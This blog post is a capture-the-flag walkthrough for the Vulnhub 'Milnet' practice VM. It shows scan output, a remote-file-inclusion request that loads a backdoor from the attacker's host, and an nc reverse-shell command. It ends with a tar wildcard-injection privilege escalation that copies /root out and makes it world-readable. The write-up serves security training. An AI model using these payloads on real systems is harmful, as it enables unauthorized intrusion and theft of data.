Mr_H4sh

Infosec, CTF and more

Milnet Solution

In this post I’m going to show you how to solve the Milnet VM provided by Warrior.

You can find the VM on this link

192.168.56.102 <== attacker
192.168.56.101 <== victim

I run nmap to check which services are running on the machine:

# Nmap 7.12 scan initiated Sat May 21 23:11:46 2016 as: nmap -sV -p- -Pn -n -v -oA 192.168.56.101_version_full 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.000079s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.35
MAC Address: 08:00:27:5B:0C:58 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 21 23:11:57 2016 -- 1 IP address (1 host up) scanned in 11.73 seconds

So, I got port 22 and port 80 open. I open the website on http://192.168.56.101 and I find a page with 3 links which are including iframes. I run nikto and this is what I find:

 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2016-05-21 23:18:43 (GMT1)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.35
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7535 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2016-05-21 23:18:56 (GMT1) (13 seconds)
---------------------------------------------------------------------------

The page http://192.168.56.101/info.php shows, indeed, the PHP configuration of the website. Tasty for us, since we can see what can we do :D I have a look at the page /content.php and I find out that it has a RFI. I run a server on my local using a simple backdoor, which will be reachable from http://192.168.56.102:8080/simple-backdoor.txt, so this is what happens:

POST /content.php?cmd=whoami HTTP/1.1
Host: 192.168.56.101
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.56.101/nav.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

route=http://192.168.56.102:8080/simple-backdoor.txt?


HTTP/1.1 200 OK
Content-type: text/html; charset=UTF-8
Connection: close
Date: Sat, 21 May 2016 23:55:02 GMT
Server: lighttpd/1.4.35
Content-Length: 80

<pre>www-data
</pre>

I go ahead and open a reverse shell on port 443:

# ON MY LOCAL TERMINAL
# nc -lvp 443
listening on [any] 443 ...


# ON THE SERVER
POST /content.php?cmd=rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.56.102+443+>/tmp/f HTTP/1.1
Host: 192.168.56.101
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.56.101/nav.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

route=http://192.168.56.102:8080/simple-backdoor.txt?

And I’m in. I wander around and I fetch the /etc/passwd file:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
langman:x:1000:1000:T. G. Langman,,,:/home/langman:/bin/bash

I go to the langman’s home folder and I find several files:

pwd 
/home/langman
ls -la
total 40
drwxr-xr-x 4 langman langman 4096 May 21 22:27 .
drwxr-xr-x 3 root    root    4096 May 21 15:45 ..
-rw------- 1 langman langman    6 May 22 00:29 .bash_history
-rw-r--r-- 1 langman langman  220 May 21 15:45 .bash_logout
-rw-r--r-- 1 langman langman 3771 May 21 15:45 .bashrc
drwx------ 2 langman langman 4096 May 21 15:48 .cache
-rw-r--r-- 1 langman langman  675 May 21 15:45 .profile
-rw------- 1 langman langman 4452 May 21 22:27 .viminfo
drwxrwxr-x 2 langman langman 4096 May 21 22:25 SDINET
cd SDINET
ls -la  
total 396
drwxrwxr-x 2 langman langman   4096 May 21 22:25 .
drwxr-xr-x 4 langman langman   4096 May 21 22:27 ..
-rw-rw-r-- 1 langman langman  74745 Feb  3  1992 DCA_Circular.310-P115-1
-rw-rw-r-- 1 langman langman  21837 Jun 26  2014 DefenseCode_Unix_WildCards_Gone_Wild.txt
-rw-rw-r-- 1 langman langman  46170 Sep 21  2009 FUN18.TXT
-rw-rw-r-- 1 langman langman   6337 Jun 15  2001 compserv.txt
-rw-rw-r-- 1 langman langman    766 May 24  1994 fips-index.
-rw-rw-r-- 1 langman langman 108282 Sep 30  1991 fips_500_166.txt
-rw-rw-r-- 1 langman langman  23135 Sep 30  1991 fips_500_169.txt
-rw-rw-r-- 1 langman langman  25048 Sep 30  1991 fips_500_170.txt
-rw-rw-r-- 1 langman langman  16044 Sep 30  1991 fips_500_171.txt
-rw-rw-r-- 1 langman langman   7534 Sep 30  1999 pentagon.txt
-rw-rw-r-- 1 langman langman   2894 Jul 10  1991 sec-8901.txt
-rw-rw-r-- 1 langman langman   3451 Jul 10  1991 sec-8902.txt
-rw-rw-r-- 1 langman langman  13214 May 21 22:19 sec-9540.txt
-rw-rw-r-- 1 langman langman  19858 May 21 22:15 sec-9720.txt

I wander around and I find something interesting on the “/etc/crontab”:

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   root  /backup/backup.sh
17 *  * * * root    cd / && run-parts --report /etc/cron.hourly
25 6  * * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6  * * 7 root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6  1 * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

The creator of the VM did a very good job hiding the /backup/backup.sh in the first row, very easy to miss it. The script /backup/backup.sh is the following:

 
#!/bin/bash
cd /var/www/html
tar cf /backup/backup.tgz *

At this point I try the following technique as you can read on the point 4.3 of the link http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt (which is also on the /home/langman/SDINET)

www-data@seckenheim:/tmp$ echo "cp -R /root/* /tmp/root; chmod -R 777 /tmp/root" > /var/www/html/exploit.sh
echo "cp -R /root/* /tmp/root; chmod -R 777 /tmp/root" > /var/www/html/exploit.sh
www-data@seckenheim:/tmp$ cat /var/www/html/exploit.sh
cat /var/www/html/exploit.sh
cp -R /root/* /tmp/root; chmod -R 777 /tmp/root
www-data@seckenheim:/tmp$ mkdir /tmp/root
mkdir /tmp/root
www-data@seckenheim:/tmp$ touch /var/www/html/--checkpoint=1
touch /var/www/html/--checkpoint=1
www-data@seckenheim:/tmp$ touch /var/www/html/--checkpoint-action=exec=sh\ exploit.sh
touch /var/www/html/--checkpoint-action=exec=sh\ exploit.sh                  
www-data@seckenheim:/tmp$ ls -l /var/www/html
ls -l /var/www/html
total 128
-rw-r--r-- 1 www-data www-data     0 May 23 23:19 --checkpoint-action=exec=sh exploit.sh
-rw-r--r-- 1 www-data www-data     0 May 23 23:19 --checkpoint=1
-rw-r--r-- 1 root     root     73450 Aug  6  2015 bomb.jpg
-rw-r--r-- 1 root     root      3901 May 21 18:56 bomb.php
-rw-r--r-- 1 root     root       124 May 21 17:50 content.php
-rw-r--r-- 1 www-data www-data    48 May 23 23:18 exploit.sh
-rw-r--r-- 1 root     root       145 May 21 17:17 index.php
-rw-r--r-- 1 www-data www-data    20 May 21 15:54 info.php
-rw-r--r-- 1 root     root       109 May 21 18:53 main.php
-rw-r--r-- 1 root     root     18260 Jan 22  2012 mj.jpg
-rw-r--r-- 1 root     root       532 May 21 23:33 nav.php
-rw-r--r-- 1 root     root       221 May 21 23:33 props.php
-rwxr-xr-x 1 www-data www-data     8 May 23 23:15 shell.sh
www-data@seckenheim:/tmp$ cd /tmp
cd /tmp
www-data@seckenheim:/tmp$ ls -l
ls -l
total 48
prw-r--r-- 1 www-data www-data     0 May 23 23:20 f
drwxrwxrwx 2 www-data www-data  4096 May 23 23:20 root
drwx------ 3 root     root      4096 May 23 22:27 systemd-private-565c60ab06bd4f8a9f3425a2fcac41cc-systemd-timesyncd.service-R3SBgL
www-data@seckenheim:/tmp$ cd root
cd root
www-data@seckenheim:/tmp/root$ ls -l
ls -l
total 4
-rwxrwxrwx 1 root root 1727 May 23 23:20 credits.txt
www-data@seckenheim:/tmp/root$ cat credits.txt
cat credits.txt
        ,----,                                                               
      ,/   .`|                                                               
    ,`   .'  :  ,---,                          ,---,.                        
  ;    ;     /,--.' |                        ,'  .' |                  ,---, 
.'___,/    ,' |  |  :                      ,---.'   |      ,---,     ,---.'| 
|    :     |  :  :  :                      |   |   .'  ,-+-. /  |    |   | : 
;    |.';  ;  :  |  |,--.   ,---.          :   :  |-, ,--.'|'   |    |   | | 
`----'  |  |  |  :  '   |  /     \         :   |  ;/||   |  ,"' |  ,--.__| | 
    '   :  ;  |  |   /' : /    /  |        |   :   .'|   | /  | | /   ,'   | 
    |   |  '  '  :  | | |.    ' / |        |   |  |-,|   | |  | |.   '  /  | 
    '   :  |  |  |  ' | :'   ;   /|        '   :  ;/||   | |  |/ '   ; |:  | 
    ;   |.'   |  :  :_:,''   |  / |        |   |    \|   | |--'  |   | '/  ' 
    '---'     |  | ,'    |   :    |        |   :   .'|   |/      |   :    :| 
              `--''       \   \  /         |   | ,'  '---'        \   \  /   
                           `----'          `----'                  `----'    
                                                                             

This was milnet for #vulnhub by @teh_warriar
I hope you enjoyed this vm!

If you liked it drop me a line on twitter or in #vulnhub.

I hope you found the clue:
/home/langman/SDINET/DefenseCode_Unix_WildCards_Gone_Wild.txt
I was sitting on the idea for using this technique for a BOOT2ROOT VM prives for a long time...

This VM was inspired by The Cuckoo's Egg. 
If you have not read it give it a try:
http://www.amazon.com/Cuckoos-Egg-Tracking-Computer-Espionage/dp/1416507787/

Thank you to Warrior for the VM and Vulnhub for hosting it. For any information or comment, please do not hesitate to leave a comment.